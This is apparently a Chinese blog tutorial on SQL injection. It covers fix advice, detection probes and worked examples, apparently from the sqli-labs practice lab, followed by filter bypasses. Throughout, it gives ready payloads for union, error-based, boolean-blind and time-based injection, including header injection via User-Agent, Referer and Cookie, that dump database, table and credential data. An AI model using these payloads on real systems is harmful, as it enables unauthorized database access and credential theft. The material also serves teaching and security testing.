SQL注入漏洞知识总结
目录:
一、SQL注入漏洞介绍
二、修复建议
三、通用姿势
四、具体实例
五、各种绕过
一、SQL注入漏洞介绍:
SQL注入攻击包括通过输入数据从客户端插入或“注入”SQL查询到应用程序。一个成功的SQL注入攻击可以从数据库中获取敏感数据、修改数据库数据(插入/更新/删除)、执行数据库管理操作(如关闭数据库管理系统)、恢复存在于数据库文件系统中的指定文件内容,在某些情况下能对操作系统发布命令。SQL注入攻击是一种注入攻击。它将SQL命令注入到数据层输入,从而影响执行预定义的SQL命令。由于用户的输入,也是SQL语句的一部分,所以攻击者可以利用这部分可以控制的内容,注入自己定义的语句,改变SQL语句执行逻辑,让数据库执行任意自己需要的指令。通过控制部分SQL语句,攻击者可以查询数据库中任何自己需要的数据,利用数据库的一些特性,可以直接获取数据库服务器的系统权限。
二、修复建议
- 使用参数化查询接口或在代码级对带入SQL语句中的外部参数进行转义或过滤;
- 对于整数,判断变量是否符合[0-9]的值;其他限定值,也可以进行合法性校验;
- 对于字符串,对SQL语句特殊字符进行转义(单引号转成两个单引号,双引号转成两个双引号)。
三、通用姿势
3.1 通过以下操作先大概判断是否存在注入点
- 如果参数(id)是数字,测试id=2-1与id=1返回的结果是否相同,如果做了2-1=1的运算,说明可能存在数字型注入。如果要用+号运算的话,因为URL编码的问题,需要把加好换成%2B,如id=1%2B1
- 在参数后面加单引号或双引号,判断返回结果是否有报错
- 添加注释符,判断前后是否有报错,如id=1' --+ 或 id=1" --+ 或id=1' # 或id=1" --+ (--后面跟+号,是把+当成空格使用)
- 有些参数可能在括号里面,如:SELECT first_name, last_name FROM users WHERE user_id = ('$id');所以也可以在参数后面加单双引号和括号,如id=1') --+ 或 id=1") --+ 或id=1') # 或id=1") --+
- 参数后面跟or 或者and,判断返回结果是否有变化,如1' or 'a'='a 或者and 'a'='a或者1' or 'a'='b或者1' or '1'='2
- 如果返回的正确页面与错误页面都一样,可以考虑时间延迟的方法判断是否存在注入,如 1’ and sleep(5)
3.2 如果存在注入,利用注入获取信息
3.2.1 查询结果如果可以直接返回
利用联合查询一步步的获取信息,如:
// 获取数据库名称,注意联合查询要求前后查询的列数和数据类型必须对应
1' union select schema_name ,1 from information_schema.schemata --
//根据上一步获取的数据库名称,获取表名
1' union select table_name from information_schema.tables where table_schema='database_name'
//根据上面的数据库名称和表名获取字段名
1' union select column_name from information_schema.columns where table_schema='database_name' and table_name='table_name'
//获取字段值,使用group_concat的目的是把查询结果合并成1列,另外,如果跨数据库查询值得花,需要使用数据库名.表明的格式,比如information_schema.schemata
1′ union select group_concat(user_id,first_name,last_name),group_concat(password) from 数据库名.表名
3.2.2 通过报错回显查询结果,如:
#利用报错回显查询到的值,回显当前的数据库名
and extractvalue(1,concat(0x7e,(select database())))
#回显表名
and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security' ))) #回显列名
and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')))
3.2.3 布尔型注入,如:
#判断数据库名的长度是多少
SELECT * FROM users where id ='1' and LENGTH(database())=8 # 二分查找发挨个判断数据库名称的每个字母
SELECT * FROM users where id ='1' and ascii(substr((select database()),1,1))>115 #挨个判断此数据库中表的每个字母
SELECT * FROM users where id ='1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),1,1))>116
3.2.4 时间延迟注入,如:
and IF(ascii(substr((select database()),1,1))>115,1,sleep(5))
四、具体实例
4.1 字符型(参数在单引号内,直接返回结果)
步骤1:参数后面加一个单引号报SQL错误
分析:单引号报错,所以参数在两个单引号里面,通过闭合单引号、联合查询直接查询到数据库数据
步骤2:构造payload
id=0' union select NULL,database(),NULL --+ #查询当前数据库的名称
#爆库名
id=0' union select null,group_concat(schema_name),null from information_schema.schemata --+
#爆表名
id=0' union select null,group_concat(table_name),null from information_schema.tables where table_schema='security' --+
#爆字段名
id=0' union select null,group_concat(column_name),null from information_schema.columns where table_schema='security' and table_name='users' --+
#获取数据库中的数据
id=0' union select null,group_concat(username,0x3a,password),null from security.users--+
4.2 数字型(直接返回结果)
步骤1:id=1与id=2-1返回相同结果,数字型注入
步骤2:构造payload
无需引号闭合,id后面直接跟联合索引就行了
#爆库名
4.3 字符型(参数在单引号和括号内、直接返回结果)
步骤1:输入单引号报错,根据报错可知参数在单引号和括号内
步骤2:闭合查询
用单引号、括号和注释闭合查询,payload: id=1') --+
步骤3:各种爆,与上面的操作相同
4.4 布尔型(参数在单引内、不返回查询结果)
步骤1:输入单引号报错,根据报错得知参数在单引号内,构造id=1' --+返回正确页面,确认存在注入
步骤2:查询结果不返回,根据id=1' and 1=1 --+ 与 id=1' and 1=2 --+返回结果不同,判断存在布尔型注入
步骤3:构造payload,先判断数据库名的长度,id=1' ' and LENGTH(database())=8 --+ 值等于8的时候返回正确的页面,说明数据库长度为8
步骤4:通过二分查找法,挨个判断数据库名称的每个字母
id=1' and ascii(substr((select database()),1,1))>110 --+ #判断第一个字母的ascii是否大于110,返回正确页面,说明大于110
id=1' and ascii(substr((select database()),1,1))>118 --+ #判断第一个字母的ascii是否大于118,返回不正确页面,说明小与等于118
id=1' and ascii(substr((select database()),1,1))>115 --+ #判断第一个字母的ascii是否大于115,返回不正确页面,说明小与等于115
id=1' and ascii(substr((select database()),1,1))>113 --+ #判断第一个字母的ascii是否大于113,返回正确页面,说明大与113 id=1' and ascii(substr((select database()),1,1))>114 --+ #判断第一个字母的ascii是否大于114,返回正确页面,说明大与114 大于114,小于等于115,第一个字母的ascii值肯定就是115了,所以第一个字母就是s,依次类推可以查到剩下的所有字母。 4.5 布尔型(参数在单引内和两个括号内、不返回查询结果)
步骤1:输入单引号报错,但没有详细的报错提示
步骤2:增加1个括号也报错,增加2个括号返回正确
步骤3:布尔型,不返回查询结果,payload与上面的相同。
4.6 时间延迟注入(无论查询是否正确都返回一样的页面)
步骤1:如论输入什么,都返回一样的页面,所以考虑时间延迟注入
步骤2:直接1 and sleep(5) --+ 没延迟,说明查询语句没有闭合成功
步骤3:猜测参数在单引号内,构造payload:id=1' and sleep(5) --+ 页面相应延迟,存在注入
步骤4:构造payload,当数据库名长度为8的时候没有延迟,说明数据库名称的长度就是8
id=1' AND IF(LENGTH(database())=8,1,sleep(10)) --+
步骤5:通过如下方式,挨个判断数据库名的字母
id=1' and IF(ascii(substr((select database()),1,1))>115,1,sleep(5)) --+
4.7 字符型报错注入(错误值被返回)
步骤1:按下面的测试,username字段存在字符型注入,参数在单引号内
步骤2:username字段输入一些无关的东西,SQL报错详情被回显
步骤3:利用extractvalue函数,让执行的结果以报错的方式显示出来
extractvalue(目标xml文档,xml路径),第二个参数的格式是/xxx/xx/xx/xx,如果格式不正确就会把报错显示出来
构造payload:uname=admin' and extractvalue(1,concat(0x7e,(select database())))--+
4.7 user-agent类型的注入
步骤1:user-agent的值被原封返回了
步骤2:这里需要借助源码审计了,否则不容易猜到真实的sql语句。
如下源码所示,SQL语句是三个字段的insert语句,然后$uagent被返回。
步骤3:结合报错注入,构造payload:
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', extractvalue(1,concat(0x7e,(select database()))),'1') #
4.8 Referer类型的注入
方法与上述相同,先闭合sql语句,然后利用报错返回,payload如下:
Referer: http://127.0.0.1/sql/Less-19/',extractvalue(1,concat(0x7e,(select database()))))#
4.9 Cookie类型的注入
步骤1:输入单引号报错,确认属于cookie类型的注入,而且报错回显了,利用报错回显数据
步骤2:构造payload
Cookie: uname=admin' and extractvalue(1,concat(0x7e,(select database()))) #
五、各种绕过
5.1 注释符被过滤(--、#)
方法1:union查询中多加一个单引号以便闭合sql语句,比如:
id=0' union select null,database(),'null
id=0' union select null,group_concat(schema_name),null from information_schema.schemata union select null,null,'nul
5.2 空格被过滤
方法1:使用/**/注释符代替空格
未完待续……
SQL注入漏洞知识总结的更多相关文章
- 从c#角度看万能密码SQL注入漏洞
以前学习渗透时,虽然也玩过万能密码SQL注入漏洞登陆网站后台,但仅仅会用,并不理解其原理. 今天学习c#数据库这一块,正好学到了这方面的知识,才明白原来是怎么回事. 众所周知的万能密码SQL注入漏洞, ...
- WEB安全:XSS漏洞与SQL注入漏洞介绍及解决方案(转)
对web安全方面的知识非常薄弱,这篇文章把Xss跨站攻击和sql注入的相关知识整理了下,希望大家多多提意见. 对于防止sql注入发生,我只用过简单拼接字符串的注入及参数化查询,可以说没什么好经验,为避 ...
- WEB安全:XSS漏洞与SQL注入漏洞介绍及解决方案
对web安全方面的知识非常薄弱,这篇文章把Xss跨站攻击和sql注入的相关知识整理了下,希望大家多多提意见. 对于防止sql注入发生,我只用过简单拼接字符串的注入及参数化查询,可以说没什么好经验,为避 ...
- 利用SQL注入漏洞登录后台的实现方法
利用SQL注入漏洞登录后台的实现方法 作者: 字体:[增加 减小] 类型:转载 时间:2012-01-12我要评论 工作需要,得好好补习下关于WEB安全方面的相关知识,故撰此文,权当总结,别无它意.读 ...
- PHPCMS \phpcms\modules\member\index.php 用户登陆SQL注入漏洞分析
catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述2. 漏洞触发条件 0x1: POC http://localhost/p ...
- SQL注入漏洞技术的详解
SQL注入漏洞详解 目录 SQL注入的分类 判断是否存在SQL注入 一:Boolean盲注 二:union 注入 三:文件读写 四:报错注入 floor报错注入 ExtractValue报错注入 Up ...
- SQL注入漏洞详解
目录 SQL注入的分类 判断是否存在SQL注入 一:Boolean盲注 二:union 注入 三:文件读写 四:报错注入 floor报错注入 ExtractValue报错注入 UpdateXml报错注 ...
- 代码审计(1):sql注入漏洞
挖掘经验:sql注入经常出现在登录界面.获取HTTP请求头.订单处理等地方.而登录界面的注入现在来说大多是发生在HTTP头里面的client-ip和x-forward-for,一般用来记录登录的ip地 ...
- PHP代码审计入门(SQL注入漏洞挖掘基础)
SQL注入漏洞 SQL注入经常出现在登陆页面.和获取HTTP头(user-agent/client-ip等).订单处理等地方,因为这几个地方是业务相对复杂的,登陆页面的注入现在来说大多数是发生在HTT ...
随机推荐
- PHP基础知识试题
转载于:http://www.php.cn/toutiao-415599.html 1.PHP中传值与传引用的区别,什么时候传值,什么时候传引用? 按值传递:函数范围内对值任何改变在函数外部都会被忽略 ...
- java class file
目录 什么是java类文件 幻数 主次版本号 常量池数和常量池 this_class super_class 接口数量和接口 字段数和字段 方法数和方法 以下内容主要还是参考<Inside JV ...
- JMeter学习笔记(一) 工具的安装和基本介绍
因为网上的资料比较多,就不多描述了,在此引用了其他大神的文档,用于学习 这个文档中有比较详细的jmeter工具介绍: https://wenku.baidu.com/view/64f3a5f75901 ...
- eclipse查看源代码问题
最近分析源代码时,eclipse总是出错,显示org.eclipse.core.runtime.CoreException,解决方法:在builderpath点击 add external jars, ...
- JSP整理
JSP全称Java Server Pages,是一种动态网页开发技术.它使用JSP标签在HTML网页中插入Java代码.标签通常以<%开头以%>结束. JSP是一种Java servlet ...
- 《More Effective C++ 》读书笔记(二)Exception 异常
这事篇读书笔记,只记录自己的理解和总结,一般情况不对其举例子具体说明,因为那正是书本身做的事情,我的笔记作为梳理和复习之用,划重点.我推荐学C++的人都好好读一遍Effective C++ 系列,真是 ...
- 用Python爬下今日头条所有美女,美滋滋!
我们的学习爬虫的动力是什么? 有人可能会说:如果我学好了,我可以找一个高薪的工作. 有人可能会说:我学习编程希望能够为社会做贡献(手动滑稽) 有人可能会说:为了妹子! ..... 其实我们会发现妹 ...
- 苹果没放弃手写笔 这样的iPad你想要吗?
12 月 31 日,美国专利与商标局(The U.S. Patent and Trademark Office)当地时间周四批准了一项来自苹果的专利申请,该专利主要描述的是一种可以通过陀螺仪.无线通讯 ...
- 动态语言的灵活性是把双刃剑 -- 以 Python 语言为例
本文有些零碎,总题来说,包括两个问题:(1)可变对象(最常见的是list dict)被意外修改的问题,(2)对参数(parameter)的检查问题.这两个问题,本质都是因为动态语言(动态类型语言)的特 ...
- scrum立会报告+燃尽图(第三周第五次)
此作业要求参见:https://edu.cnblogs.com/campus/nenu/2018fall/homework/2286 项目地址:https://coding.net/u/wuyy694 ...